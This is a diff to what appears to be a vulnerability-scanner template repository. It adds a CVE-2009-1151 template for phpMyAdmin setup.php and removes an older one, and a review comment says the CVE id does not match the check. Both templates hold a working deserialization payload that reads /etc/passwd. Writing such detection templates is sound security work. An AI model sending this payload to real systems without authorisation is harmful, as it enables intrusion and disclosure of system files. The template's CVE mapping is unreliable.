diff --git a/cves/2009/CVE-2009-1151.yaml b/cves/2009/CVE-2009-1151.yaml
new file mode 100644
index 0000000000..056bd4e4e7
--- /dev/null
+++ b/cves/2009/CVE-2009-1151.yaml
@@ -0,0 +1,35 @@
+id: CVE-2009-1151
+
+info:
+ name: PhpMyAdmin Scripts/setup.php Deserialization Vulnerability
+ author: princechaddha
+ severity: high
+ description: Setup script used to generate configuration can be fooled using a crafted POST request to include arbitrary PHP code in generated configuration file. Combined with ability to save files on server, this can allow unauthenticated users to execute arbitrary PHP code.
+ reference: https://www.phpmyadmin.net/security/PMASA-2009-3/
+ vulhub: https://github.com/vulhub/vulhub/tree/master/phpmyadmin/WooYun-2016-199433
+ tags: phpmyadmin,rce,deserialization
+
+requests:
+ - raw:
+ - |
+ POST /scripts/setup.php HTTP/1.1
+ Host: {{Hostname}}
+ Accept-Encoding: gzip, deflate
+ Accept: */*
+ Accept-Language: en
+ User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
+ Connection: close
+ Content-Type: application/x-www-form-urlencoded
+ Content-Length: 80
+
+ action=test&configuration=O:10:"PMA_Config":1:{s:6:"source",s:11:"/etc/passwd";}
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: regex
+ regex:
+ - "root:[x*]:0:0:"
\ No newline at end of file
diff --git a/vulnerabilities/other/phpmyadmin-setup-deserialization.yaml b/vulnerabilities/other/phpmyadmin-setup-deserialization.yaml
deleted file mode 100644
index 2ee56b7fae..0000000000
--- a/vulnerabilities/other/phpmyadmin-setup-deserialization.yaml
+++ /dev/null
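Review bot: The new `id: CVE-2009-1151` and the `description` (PHP code written into the generated configuration file) do not match what the request checks, which is a serialized `PMA_Config` object sent with `action=test` and a matcher for `/etc/passwd` content, i.e. a file read through unserialize. These look like two different setup.php issues, so a hit could be reported under an advisory (PMASA-2009-3) whose fixed versions do not apply. Please confirm the mapping, or keep a non-CVE id and describe the deserialization issue in `description`. Separately, `vulhub:` is not a usual key under `info`, so both URLs are better listed under `reference:` as a list (`- https://www.phpmyadmin.net/security/PMASA-2009-3/` and `- https://github.com/vulhub/vulhub/tree/master/phpmyadmin/WooYun-2016-199433`). The hard-coded `Content-Length: 80` matches this body today but goes stale on any edit, so consider dropping it if the engine fills the header in.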
@@ -1,18 +0,0 @@
-id: phpmyadmin-setup-deserialization
-info:
- name: phpmyadmin Scripts/setup.php Deserialization Vulnerabilityn
- author: princechaddha
- severity: high
- reference: https://github.com/vulhub/vulhub/tree/master/phpmyadmin/WooYun-2016-199433
- tags: phpmyadmin,rce
-
-requests:
- - method: POST
- path:
- - "{{BaseURL}}/scripts/setup.php"
- body: 'action=test&configuration=O:10:"PMA_Config":1:{s:6:"source",s:11:"/etc/passwd";}'
-
- matchers:
- - type: regex
- regex:
- - "root:[x*]:0:0:"